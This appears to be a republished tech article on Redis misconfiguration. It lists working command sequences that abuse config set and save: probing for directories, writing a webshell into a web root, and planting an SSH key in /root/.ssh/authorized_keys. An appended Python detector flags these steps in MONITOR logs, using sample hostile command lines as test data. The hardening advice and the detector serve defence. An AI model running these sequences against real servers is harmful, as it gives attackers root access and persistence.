
Some interesting things about Redis

2025-04-07 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

On many servers Redis is started with root privileges, so anyone who can send it commands can use that root to do a lot of super-privileged things. Because Redis does not have a strict authorization mechanism, it must never be bound to 0.0.0.0 in a deployment, and it is best to set requirepass (the password is stored in plaintext, but it at least raises the difficulty).

In this article we mainly use two commands provided by Redis, config and save, to complete our HACK. Convenient features, bent to the wrong purpose, become a scourge.

A brief introduction to a few useful commands

config set dir $path:

Sets the "working directory" of Redis. RDB and AOF files generated afterwards are stored there.

config set dbfilename $name:

Sets the RDB file name; the default is "dump.rdb".

save:

Persists the data in memory to disk.

Together, they make the following interesting things possible.

1. Check whether a folder exists

config set dir /home/bob

If (error) ERR Changing directory: No such file or directory is returned, the folder does not exist.

If OK is returned, the folder exists on the server and has been set as the directory where the memory snapshot is saved.

2. webshell

It is best to run flushdb or flushall before use to clear the data in memory.

    config set dir /opt/web/www        # sets the directory of the website
    config set dbfilename test.php     # sets the file name to be saved
    set "#"                            # our webshell
    save                               # persists memory to test.php

3. Access trust

    cat ~/.ssh/id_rsa.pub > ~/foo.txt
    cat ~/foo.txt | redis-cli -x set hack    # saves the contents of foo.txt as a string with the key hack
    config set dir /root/.ssh/               # sets the directory to root's .ssh folder
    config set dbfilename authorized_keys
    save
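A defensive counterpart to the procedures above, as an added example that is not part of the original article: a small Python detector that reads Redis MONITOR output and flags a SAVE or BGSAVE issued while config set has pointed dir or dbfilename at a sensitive target. The sample lines are constructed, and the path and file-name patterns are assumptions chosen for illustration.

```python
import re

# Redis MONITOR line: <unix time> [<db> <client addr>] "<arg>" "<arg>" ...
LINE = re.compile(r'^(\d+\.\d+) \[(\d+) (\S+)\] (.*)$')
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Example heuristics (assumptions): targets a snapshot should never be written to.
SENSITIVE_DIR = re.compile(r'/\.ssh/?$|/www(/|$)')
SENSITIVE_NAME = re.compile(r'^authorized_keys$|\.(php|jsp|aspx?)$', re.I)

def detect(lines):
    """Alert on SAVE/BGSAVE issued while dir/dbfilename point at a sensitive target."""
    state = {}   # server-wide settings changed via CONFIG SET: name -> value
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        args = ARG.findall(m.group(4)) if m else []
        if not args:
            continue                      # not a command line (e.g. the initial "OK")
        ts, client = m.group(1), m.group(3)
        cmd = [a.lower() for a in args[:3]]
        if cmd[:2] == ['config', 'set'] and len(args) >= 4 and cmd[2] in ('dir', 'dbfilename'):
            state[cmd[2]] = args[3]       # remember where the next snapshot will land
        elif cmd[0] in ('save', 'bgsave'):
            reasons = []
            if SENSITIVE_DIR.search(state.get('dir', '')):
                reasons.append('dir=' + state['dir'])
            if SENSITIVE_NAME.search(state.get('dbfilename', '')):
                reasons.append('dbfilename=' + state['dbfilename'])
            if reasons:
                alerts.append({'time': float(ts), 'client': client, 'reasons': reasons})
    return alerts

# Constructed MONITOR capture (192.0.2.10 is a documentation address).
SAMPLE = [
    '1717200001.100000 [0 192.0.2.10:51234] "flushall"',
    '1717200002.100000 [0 192.0.2.10:51234] "CONFIG" "SET" "dir" "/root/.ssh/"',
    '1717200003.100000 [0 192.0.2.10:51234] "config" "set" "dbfilename" "authorized_keys"',
    '1717200004.100000 [0 192.0.2.10:51234] "save"',
]
BENIGN = [
    '1717200010.100000 [0 127.0.0.1:40000] "config" "set" "dir" "/var/lib/redis"',
    '1717200011.100000 [0 127.0.0.1:40000] "config" "set" "dbfilename" "dump.rdb"',
    '1717200012.100000 [0 127.0.0.1:40000] "bgsave"',
]

if __name__ == '__main__':
    print(detect(SAMPLE))
```

MONITOR is costly on a busy server, so in production the same logic is better fed from a proxy or audit log that records commands in a comparable form.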
